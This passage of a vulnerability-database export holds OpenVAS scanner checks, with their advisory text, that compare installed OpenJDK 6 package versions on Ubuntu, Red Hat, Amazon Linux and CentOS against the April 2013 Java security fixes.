(CVE-2013-2417, CVE-2013-2419)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b27-1.12.5-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm\", ver:\"6b27-1.12.5-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b27-1.12.5-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b27-1.12.5-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b27-1.12.5-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b27-1.12.5-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b27-1.12.5-0ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm\", ver:\"6b27-1.12.5-0ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b27-1.12.5-0ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b27-1.12.5-0ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b27-1.12.5-0ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b27-1.12.5-0ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b27-1.12.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b27-1.12.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b27-1.12.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b27-1.12.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b27-1.12.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-02-06T13:10:31", "bulletinFamily": "scanner", "description": "Check for the Version of java-1.6.0-openjdk", "modified": "2018-02-05T00:00:00", "published": "2013-04-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870988", "id": "OPENVAS:870988", "title": "RedHat Update for java-1.6.0-openjdk RHSA-2013:0770-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.6.0-openjdk RHSA-2013:0770-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n Multiple flaws were discovered in the font layout engine in the 2D\n component. An untrusted Java application or applet could possibly use these\n flaws to trigger Java Virtual Machine memory corruption. (CVE-2013-1569,\n CVE-2013-2383, CVE-2013-2384)\n\n Multiple improper permission check issues were discovered in the Beans,\n Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java\n application or applet could use these flaws to bypass Java sandbox\n restrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-1518, CVE-2013-1557)\n\n The previous default value of the java.rmi.server.useCodebaseOnly property\n permitted the RMI implementation to automatically load classes from\n remotely specified locations. An attacker able to connect to an application\n using RMI could use this flaw to make the application execute arbitrary\n code. (CVE-2013-1537)\n\n Note: The fix for CVE-2013-1537 changes the default value of the property\n to true, restricting class loading to the local CLASSPATH and locations\n specified in the java.rmi.server.codebase property. Refer to Red Hat\n Bugzilla bug 952387 for additional details.\n\n The 2D component did not properly process certain images. An untrusted Java\n application or applet could possibly use this flaw to trigger Java Virtual\n Machine memory corruption. (CVE-2013-2420)\n\n It was discovered that the Hotspot component did not properly handle\n certain intrinsic frames, and did not correctly perform MethodHandle\n lookups. An untrusted Java application or applet could use these flaws to\n bypass Java sandbox restrictions. (CVE-2013-2431, CVE-2013-2421)\n\n It was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO\n component did not protect against modification of their state while\n performing certain native code operations. An untrusted Java application or\n applet could possibly use these flaws to trigger Java Virtual Machine\n memory corruption. (CVE-2013-2429, CVE-2013-2430)\n\n The JDBC driver manager could incorrectly call the toString() method in\n JDBC drivers, and the ConcurrentHashMap class could incorrectly call the\n defaultReadObject() method. An untrusted Java application or applet could\n possibly use these flaws to bypass Java sandbox restrictions.\n (CVE-2013-1488, CVE-2013-2426)\n\n The sun.awt.datatransfer.ClassLoaderObjectIn ...\n\n Description truncated, for more information please check the Reference URL\";\n\n\ntag_affected = \"java-1.6.0-openjdk on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(870988);\n script_version(\"$Revision: 8672 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-05 17:39:18 +0100 (Mon, 05 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-25 10:18:55 +0530 (Thu, 25 Apr 2013)\");\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\",\n \"CVE-2013-1557\", \"CVE-2013-1558\", \"CVE-2013-1569\", \"CVE-2013-2383\",\n \"CVE-2013-2384\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2419\",\n \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\", \"CVE-2013-2424\",\n \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for java-1.6.0-openjdk RHSA-2013:0770-01\");\n\n script_xref(name: \"RHSA\", value: \"2013:0770-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2013-April/msg00035.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of java-1.6.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.61.1.11.11.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:07", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120271", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120271", "title": "Amazon Linux Local Check: alas-2013-185", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2013-185.nasl 6577 2017-07-06 13:43:46Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120271\");\n script_version(\"$Revision: 11711 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:22:02 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 14:30:57 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: alas-2013-185\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in OpenJDK. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update java-1.6.0-openjdk to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2013-185.html\");\n script_cve_id(\"CVE-2013-2419\", \"CVE-2013-0401\", \"CVE-2013-1569\", \"CVE-2013-1537\", \"CVE-2013-2383\", \"CVE-2013-1518\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2421\", \"CVE-2013-2420\", \"CVE-2013-2430\", \"CVE-2013-2431\", \"CVE-2013-2424\", \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-1488\", \"CVE-2013-1558\", \"CVE-2013-2422\", \"CVE-2013-2384\", \"CVE-2013-1557\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.0~61.1.11.11.53.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~61.1.11.11.53.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~61.1.11.11.53.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~61.1.11.11.53.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~61.1.11.11.53.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~61.1.11.11.53.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:21:50", "bulletinFamily": "scanner", "description": "Check for the Version of openjdk-6", "modified": "2017-12-01T00:00:00", "published": "2013-05-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=841421", "id": "OPENVAS:841421", "title": "Ubuntu Update for openjdk-6 USN-1819-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1819_1.nasl 7958 2017-12-01 06:47:47Z santu $\n#\n# Ubuntu Update for openjdk-6 USN-1819-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ben Murphy discovered a vulnerability in the OpenJDK JRE related to\n information disclosure and data integrity. An attacker could exploit this\n to execute arbitrary code. (CVE-2013-0401)\n\n James Forshaw discovered a vulnerability in the OpenJDK JRE related to\n information disclosure, data integrity and availability. An attacker could\n exploit this to execute arbitrary code. (CVE-2013-1488)\n\n Several vulnerabilities were discovered in the OpenJDK JRE related to\n information disclosure, data integrity and availability. An attacker could\n exploit these to cause a denial of service or expose sensitive data over\n the network. (CVE-2013-1518, CVE-2013-1537, CVE-2013-1557, CVE-2013-1558,\n CVE-2013-1569, CVE-2013-2383, CVE-2013-2384, CVE-2013-2420, CVE-2013-2421,\n CVE-2013-2422, CVE-2013-2426, CVE-2013-2429, CVE-2013-2430, CVE-2013-2431,\n CVE-2013-2436)\n\n Two vulnerabilities were discovered in the OpenJDK JRE related to\n confidentiality. An attacker could exploit these to expose sensitive data\n over the network. (CVE-2013-2415, CVE-2013-2424)\n\n Two vulnerabilities were discovered in the OpenJDK JRE related to\n availability. An attacker could exploit these to cause a denial of service.\n (CVE-2013-2417, CVE-2013-2419)\";\n\n\ntag_affected = \"openjdk-6 on Ubuntu 12.04 LTS ,\n Ubuntu 11.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(841421);\n script_version(\"$Revision: 7958 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:47:47 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-09 10:26:30 +0530 (Thu, 09 May 2013)\");\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\",\n \"CVE-2013-1557\", \"CVE-2013-1558\", \"CVE-2013-1569\", \"CVE-2013-2383\",\n \"CVE-2013-2384\", \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\",\n \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\",\n \"CVE-2013-2436\", \"CVE-2013-2415\", \"CVE-2013-2424\", \"CVE-2013-2417\",\n \"CVE-2013-2419\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for openjdk-6 USN-1819-1\");\n\n script_xref(name: \"USN\", value: \"1819-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1819-1/\");\n script_summary(\"Check for the Version of openjdk-6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b27-1.12.5-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm\", ver:\"6b27-1.12.5-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b27-1.12.5-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b27-1.12.5-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b27-1.12.5-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b27-1.12.5-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b27-1.12.5-0ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm\", ver:\"6b27-1.12.5-0ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b27-1.12.5-0ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b27-1.12.5-0ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b27-1.12.5-0ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b27-1.12.5-0ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b27-1.12.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b27-1.12.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b27-1.12.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b27-1.12.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b27-1.12.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:13", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-04-25T00:00:00", "id": "OPENVAS:1361412562310881719", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881719", "title": "CentOS Update for java CESA-2013:0770 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0770 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_tag(name:\"affected\", value:\"java on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n Multiple flaws were discovered in the font layout engine in the 2D\n component. An untrusted Java application or applet could possibly use these\n flaws to trigger Java Virtual Machine memory corruption. (CVE-2013-1569,\n CVE-2013-2383, CVE-2013-2384)\n\n Multiple improper permission check issues were discovered in the Beans,\n Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java\n application or applet could use these flaws to bypass Java sandbox\n restrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-1518, CVE-2013-1557)\n\n The previous default value of the java.rmi.server.useCodebaseOnly property\n permitted the RMI implementation to automatically load classes from\n remotely specified locations. An attacker able to connect to an application\n using RMI could use this flaw to make the application execute arbitrary\n code. (CVE-2013-1537)\n\n Note: The fix for CVE-2013-1537 changes the default value of the property\n to true, restricting class loading to the local CLASSPATH and locations\n specified in the java.rmi.server.codebase property. Refer to Red Hat\n Bugzilla bug 952387 for additional details.\n\n The 2D component did not properly process certain images. An untrusted Java\n application or applet could possibly use this flaw to trigger Java Virtual\n Machine memory corruption. (CVE-2013-2420)\n\n It was discovered that the Hotspot component did not properly handle\n certain intrinsic frames, and did not correctly perform MethodHandle\n lookups. An untrusted Java application or applet could use these flaws to\n bypass Java sandbox restrictions. (CVE-2013-2431, CVE-2013-2421)\n\n It was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO\n component did not protect against modification of their state while\n performing certain native code operations. An untrusted Java application or\n applet could possibly use these flaws to trigger Java Virtual Machine\n memory corruption. 